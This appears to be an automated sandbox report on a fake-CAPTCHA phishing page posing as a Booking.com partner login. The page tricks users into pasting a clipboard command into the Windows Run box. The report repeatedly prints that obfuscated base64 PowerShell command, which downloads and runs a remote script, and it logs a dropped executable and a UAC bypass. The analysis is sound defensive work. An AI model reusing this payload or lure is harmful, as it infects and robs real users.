              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 5128 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 5128 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exe Windows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 6336 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 6336 get message C:\Windows\System32\UIAutomationCore.DLL

              System Summary

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4256 -s 1500
              Source: unknownProcess created: C:\Windows\System32\AtBroker.exe atbroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
              Source: classification engineClassification label: mal100.phis.spyw.evad.win@43/10@30/197
              Source: C:\Windows\System32\Narrator.exeFile created: C:\Users\user\AppData\Local\speech
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3sac0ce.ksg.ps1
              Source: C:\Windows\System32\AtBroker.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\AtBroker.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,18405873602495973812,11393449269972753126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: unknown | Process created: C:\Windows\System32\AtBroker.exe atbroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exe | Process created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exe | Process created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
              Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe "C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe" -ServerName:App.AppX2nbh7wcbt82z2dktjrtwk4f36gf9xxh2.mca
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" 0xaa79fbd8
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe | Process created: C:\Windows\System32\winver.exe C:\Windows\System32\winver.exe
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe | Process created: C:\Windows\System32\ComputerDefaults.exe
              Source: C:\Windows\System32\ComputerDefaults.exe | Process created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe"
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4256 -s 1500
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.applicationmodel.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.ui.xaml.controls.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: msxml6.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: directmanipulation.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.graphics.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: uiautomationcore.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: oleacc.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: mswb7.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: icu.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: dxgi.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\AtBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

              Data Obfuscation

              Source: Yara matchFile source: 00000014.00000002.2278146446.000001F58C8DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2277861314.000001F58BFD0000.00000004.08000000.00040000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2278146446.000001F58DBEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045'

              Persistence and Installation Behavior

              Source: screenshotOCR Text: x about:blank x Booking.cam - Partner Hub -Z vstrrrlineproperrms.world/sign-in?op_token=TfJdHmL8tgyxynNyAVQfoJA5C16hyqzkaKUihdfmGSMECOhmRPG7L51SpinTV211Jg6pqPRSZOtlubLL8VAYQb... Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Private,' - Terms Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 11:10 ENG p Type here to search SG W05/2025
              Source: Chrome DOM: 3.5OCR Text: Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Privygy - Terms Verification Steps Press Windows Button C' 1 2 Press CTRL + V 3. Press Enter
              Source: screenshotOCR Text: x about:blank x Booking.cam - Partner Hub -Z vstrrrlineproperrms.world/sign-in?op_token=TfJdHmL8tgyxynNyAVQfoJA5C16hyqzkaKUihdfmGSMECOhmRPG7L51SpinTV211Jg6pqPRSZOtlubLL8VAYQb... Robot or human ? Check the box to confirm that you're human. Thank You! c I'm not a robot reCAPTCHA Private,' - Terms Verification Steps 1. Windows Button 'C" + R 2. Press CTRL + V 3. Press Enter 11:10 ENG p Type here to search SG W05/2025
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: powershell -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access -
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe
              Source: C:\Windows\System32\AtBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\Narrator.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3019
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6815
              Source: C:\Windows\System32\svchost.exe TID: 4736Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 3019 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 6815 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\Narrator.exe TID: 6500Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\AtBroker.exeProcess information queried: ProcessInformation
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w h -c "$cmd='';$b='axdyigh0dhbzoi8vyxbpb2vrcy5py3uvzml4ic1vc2vcyxnpy1bhcnnpbmd8awv4';$cmd=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($b));iex $cmd;$null=' confirm access - 7891045'
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
